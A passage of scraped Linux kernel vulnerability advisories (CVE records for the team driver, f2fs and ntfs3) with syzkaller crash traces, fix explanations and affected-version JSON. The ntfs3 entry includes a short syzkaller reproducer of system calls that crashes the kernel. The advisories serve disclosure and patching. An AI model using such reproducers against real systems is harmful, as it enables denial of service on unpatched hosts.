Code: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 <0f> 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff
RSP: 0018:ffffc9000d49f370 EFLAGS: 00010286
RAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000
RDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005
RBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000
R10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230
R13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480
FS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0
Call Trace:
<TASK>
__list_del_entry_valid include/linux/list.h:132 [inline]
__list_del_entry include/linux/list.h:223 [inline]
list_del_rcu include/linux/rculist.h:178 [inline]
__team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]
__team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]
team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]
team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534
team_option_set drivers/net/team/team_core.c:376 [inline]
team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653
genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115
genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]
genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210
netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552
genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219
netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346
netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896
sock_sendmsg_nosec net/socket.c:727 [inline]
__sock_sendmsg net/socket.c:742 [inline]
____sys_sendmsg+0xa98/0xc70 net/socket.c:2630
___sys_sendmsg+0x134/0x1d0 net/socket.c:2684
__sys_sendmsg+0x16d/0x220 net/socket.c:2716
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
The problem is in this flow:
1) Port is enabled, queue_id != 0, in qom_list
2) Port gets disabled
-> team_port_disable()
-> team_queue_override_port_del()
-> del (removed from list)
3) Port is disabled, queue_id != 0, not in any list
4) Priority changes
-> team_queue_override_port_prio_changed()
-> checks: port disabled && queue_id != 0
-> calls del - hits the BUG as it is removed already
To fix this, change the check in team_queue_override_port_prio_changed()
so it returns early if port is not enabled.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 25029e813c4aae5fcf7118e8dd5c56e382b9a1a3
(git)
Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < f820e438b8ec2a8354e70e75145f05fe45500d97 (git) Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 53a727a8bfd78c739e130a781192d0f6f8e03d39 (git) Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 6bfb62b6010a16112dcae52f490e5e0e6abe12a3 (git) Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 107d245f84cb4f55f597d31eda34b42a2b7d6952 (git) Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < b71187648ef2349254673d0523fdf96d1fe3d758 (git) Affected: 6c31ff366c1116823e77019bae3e92e9d77a49f4 , < 932ac51d9953eaf77a1252f79b656d4ca86163c6 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/team/team_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "25029e813c4aae5fcf7118e8dd5c56e382b9a1a3",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "f820e438b8ec2a8354e70e75145f05fe45500d97",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "53a727a8bfd78c739e130a781192d0f6f8e03d39",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "6bfb62b6010a16112dcae52f490e5e0e6abe12a3",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "107d245f84cb4f55f597d31eda34b42a2b7d6952",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "b71187648ef2349254673d0523fdf96d1fe3d758",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
},
{
"lessThan": "932ac51d9953eaf77a1252f79b656d4ca86163c6",
"status": "affected",
"version": "6c31ff366c1116823e77019bae3e92e9d77a49f4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/team/team_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.11"
},
{
"lessThan": "3.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "3.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:52.704Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/25029e813c4aae5fcf7118e8dd5c56e382b9a1a3"
},
{
"url": "https://git.kernel.org/stable/c/f820e438b8ec2a8354e70e75145f05fe45500d97"
},
{
"url": "https://git.kernel.org/stable/c/53a727a8bfd78c739e130a781192d0f6f8e03d39"
},
{
"url": "https://git.kernel.org/stable/c/6bfb62b6010a16112dcae52f490e5e0e6abe12a3"
},
{
"url": "https://git.kernel.org/stable/c/107d245f84cb4f55f597d31eda34b42a2b7d6952"
},
{
"url": "https://git.kernel.org/stable/c/b71187648ef2349254673d0523fdf96d1fe3d758"
},
{
"url": "https://git.kernel.org/stable/c/932ac51d9953eaf77a1252f79b656d4ca86163c6"
}
],
"title": "team: fix check for port enabled in team_queue_override_port_prio_changed()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71091",
"datePublished": "2026-01-13T15:34:52.431Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:52.704Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68796 (GCVE-0-2025-68796)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
f2fs: fix to avoid updating zero-sized extent in extent cache
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to avoid updating zero-sized extent in extent cache
As syzbot reported:
F2FS-fs (loop0): __update_extent_tree_range: extent len is zero, type: 0, extent [0, 0, 0], age [0, 0]
------------[ cut here ]------------
kernel BUG at fs/f2fs/extent_cache.c:678!
Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI
CPU: 0 UID: 0 PID: 5336 Comm: syz.0.0 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
RIP: 0010:__update_extent_tree_range+0x13bc/0x1500 fs/f2fs/extent_cache.c:678
Call Trace:
<TASK>
f2fs_update_read_extent_cache_range+0x192/0x3e0 fs/f2fs/extent_cache.c:1085
f2fs_do_zero_range fs/f2fs/file.c:1657 [inline]
f2fs_zero_range+0x10c1/0x1580 fs/f2fs/file.c:1737
f2fs_fallocate+0x583/0x990 fs/f2fs/file.c:2030
vfs_fallocate+0x669/0x7e0 fs/open.c:342
ioctl_preallocate fs/ioctl.c:289 [inline]
file_ioctl+0x611/0x780 fs/ioctl.c:-1
do_vfs_ioctl+0xb33/0x1430 fs/ioctl.c:576
__do_sys_ioctl fs/ioctl.c:595 [inline]
__se_sys_ioctl+0x82/0x170 fs/ioctl.c:583
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f07bc58eec9
In error path of f2fs_zero_range(), it may add a zero-sized extent
into extent cache, it should be avoided.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
6e9619499f53b22ead972e476c0e8341c997d929 , < 9c07bd262c13ca922adad6e7613d48505f97f548
(git)
Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < 72c58a82e6fb7b327e8701f5786c70c3edc56188 (git) Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < e50b81c50fcbe63f50405bb40f262162ff32af88 (git) Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < efe3371001f50a2d6f746b50bdc6f9f26b2089ec (git) Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < 4f244c64efe628d277b916f47071adf480eb8646 (git) Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < bac23833220a1f8fe8dfab7e16efa20ff64d7589 (git) Affected: 6e9619499f53b22ead972e476c0e8341c997d929 , < 7c37c79510329cd951a4dedf3f7bf7e2b18dccec (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9c07bd262c13ca922adad6e7613d48505f97f548",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "72c58a82e6fb7b327e8701f5786c70c3edc56188",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "e50b81c50fcbe63f50405bb40f262162ff32af88",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "efe3371001f50a2d6f746b50bdc6f9f26b2089ec",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "4f244c64efe628d277b916f47071adf480eb8646",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "bac23833220a1f8fe8dfab7e16efa20ff64d7589",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
},
{
"lessThan": "7c37c79510329cd951a4dedf3f7bf7e2b18dccec",
"status": "affected",
"version": "6e9619499f53b22ead972e476c0e8341c997d929",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid updating zero-sized extent in extent cache\n\nAs syzbot reported:\n\nF2FS-fs (loop0): __update_extent_tree_range: extent len is zero, type: 0, extent [0, 0, 0], age [0, 0]\n------------[ cut here ]------------\nkernel BUG at fs/f2fs/extent_cache.c:678!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 0 UID: 0 PID: 5336 Comm: syz.0.0 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__update_extent_tree_range+0x13bc/0x1500 fs/f2fs/extent_cache.c:678\nCall Trace:\n \u003cTASK\u003e\n f2fs_update_read_extent_cache_range+0x192/0x3e0 fs/f2fs/extent_cache.c:1085\n f2fs_do_zero_range fs/f2fs/file.c:1657 [inline]\n f2fs_zero_range+0x10c1/0x1580 fs/f2fs/file.c:1737\n f2fs_fallocate+0x583/0x990 fs/f2fs/file.c:2030\n vfs_fallocate+0x669/0x7e0 fs/open.c:342\n ioctl_preallocate fs/ioctl.c:289 [inline]\n file_ioctl+0x611/0x780 fs/ioctl.c:-1\n do_vfs_ioctl+0xb33/0x1430 fs/ioctl.c:576\n __do_sys_ioctl fs/ioctl.c:595 [inline]\n __se_sys_ioctl+0x82/0x170 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f07bc58eec9\n\nIn error path of f2fs_zero_range(), it may add a zero-sized extent\ninto extent cache, it should be avoided."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:08.293Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9c07bd262c13ca922adad6e7613d48505f97f548"
},
{
"url": "https://git.kernel.org/stable/c/72c58a82e6fb7b327e8701f5786c70c3edc56188"
},
{
"url": "https://git.kernel.org/stable/c/e50b81c50fcbe63f50405bb40f262162ff32af88"
},
{
"url": "https://git.kernel.org/stable/c/efe3371001f50a2d6f746b50bdc6f9f26b2089ec"
},
{
"url": "https://git.kernel.org/stable/c/4f244c64efe628d277b916f47071adf480eb8646"
},
{
"url": "https://git.kernel.org/stable/c/bac23833220a1f8fe8dfab7e16efa20ff64d7589"
},
{
"url": "https://git.kernel.org/stable/c/7c37c79510329cd951a4dedf3f7bf7e2b18dccec"
}
],
"title": "f2fs: fix to avoid updating zero-sized extent in extent cache",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68796",
"datePublished": "2026-01-13T15:29:06.892Z",
"dateReserved": "2025-12-24T10:30:51.042Z",
"dateUpdated": "2026-01-19T12:19:08.293Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71067 (GCVE-0-2025-71067)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-14 08:51
VLAI?
EPSS
Title
ntfs: set dummy blocksize to read boot_block when mounting
Summary
In the Linux kernel, the following vulnerability has been resolved:
ntfs: set dummy blocksize to read boot_block when mounting
When mounting, sb->s_blocksize is used to read the boot_block without
being defined or validated. Set a dummy blocksize before attempting to
read the boot_block.
The issue can be triggered with the following syz reproducer:
mkdirat(0xffffffffffffff9c, &(0x7f0000000080)='./file1\x00', 0x0)
r4 = openat$nullb(0xffffffffffffff9c, &(0x7f0000000040), 0x121403, 0x0)
ioctl$FS_IOC_SETFLAGS(r4, 0x40081271, &(0x7f0000000980)=0x4000)
mount(&(0x7f0000000140)=@nullb, &(0x7f0000000040)='./cgroup\x00',
&(0x7f0000000000)='ntfs3\x00', 0x2208004, 0x0)
syz_clone(0x88200200, 0x0, 0x0, 0x0, 0x0, 0x0)
Here, the ioctl sets the bdev block size to 16384. During mount,
get_tree_bdev_flags() calls sb_set_blocksize(sb, block_size(bdev)),
but since block_size(bdev) > PAGE_SIZE, sb_set_blocksize() leaves
sb->s_blocksize at zero.
Later, ntfs_init_from_boot() attempts to read the boot_block while
sb->s_blocksize is still zero, which triggers the bug.
[almaz.alexandrovich@paragon-software.com: changed comment style, added
return value handling]
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
28861e3bbd9e7ac4cd9c811aad71b4d116e27930 , < 44a38eb4f7876513db5a1bccde74de9bc4389d43
(git)
Affected: 28861e3bbd9e7ac4cd9c811aad71b4d116e27930 , < 4fff9a625da958a33191c8553a03283786f9f417 (git) Affected: 28861e3bbd9e7ac4cd9c811aad71b4d116e27930 , < b3c151fe8f543f1a0b8b5df16ce5d97afa5ec85a (git) Affected: 28861e3bbd9e7ac4cd9c811aad71b4d116e27930 , < d1693a7d5a38acf6424235a6070bcf5b186a360d (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ntfs3/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "44a38eb4f7876513db5a1bccde74de9bc4389d43",
"status": "affected",
"version": "28861e3bbd9e7ac4cd9c811aad71b4d116e27930",
"versionType": "git"
},
{
"lessThan": "4fff9a625da958a33191c8553a03283786f9f417",
"status": "affected",
"version": "28861e3bbd9e7ac4cd9c811aad71b4d116e27930",
"versionType": "git"
},
{
"lessThan": "b3c151fe8f543f1a0b8b5df16ce5d97afa5ec85a",
"status": "affected",
"version": "28861e3bbd9e7ac4cd9c811aad71b4d116e27930",
"versionType": "git"
},
{
"lessThan": "d1693a7d5a38acf6424235a6070bcf5b186a360d",
"status": "affected",
"version": "28861e3bbd9e7ac4cd9c811aad71b4d116e27930",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ntfs3/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs: set dummy blocksize to read boot_block when mounting\n\nWhen mounting, sb-\u003es_blocksize is used to read the boot_block without\nbeing defined or validated. Set a dummy blocksize before attempting to\nread the boot_block.\n\nThe issue can be triggered with the following syz reproducer:\n\n mkdirat(0xffffffffffffff9c, \u0026(0x7f0000000080)=\u0027./file1\\x00\u0027, 0x0)\n r4 = openat$nullb(0xffffffffffffff9c, \u0026(0x7f0000000040), 0x121403, 0x0)\n ioctl$FS_IOC_SETFLAGS(r4, 0x40081271, \u0026(0x7f0000000980)=0x4000)\n mount(\u0026(0x7f0000000140)=@nullb, \u0026(0x7f0000000040)=\u0027./cgroup\\x00\u0027,\n \u0026(0x7f0000000000)=\u0027ntfs3\\x00\u0027, 0x2208004, 0x0)\n syz_clone(0x88200200, 0x0, 0x0, 0x0, 0x0, 0x0)\n\nHere, the ioctl sets the bdev block size to 16384. During mount,\nget_tree_bdev_flags() calls sb_set_blocksize(sb, block_size(bdev)),\nbut since block_size(bdev) \u003e PAGE_SIZE, sb_set_blocksize() leaves\nsb-\u003es_blocksize at zero.\n\nLater, ntfs_init_from_boot() attempts to read the boot_block while\nsb-\u003es_blocksize is still zero, which triggers the bug.\n\n[almaz.alexandrovich@paragon-software.com: changed comment style, 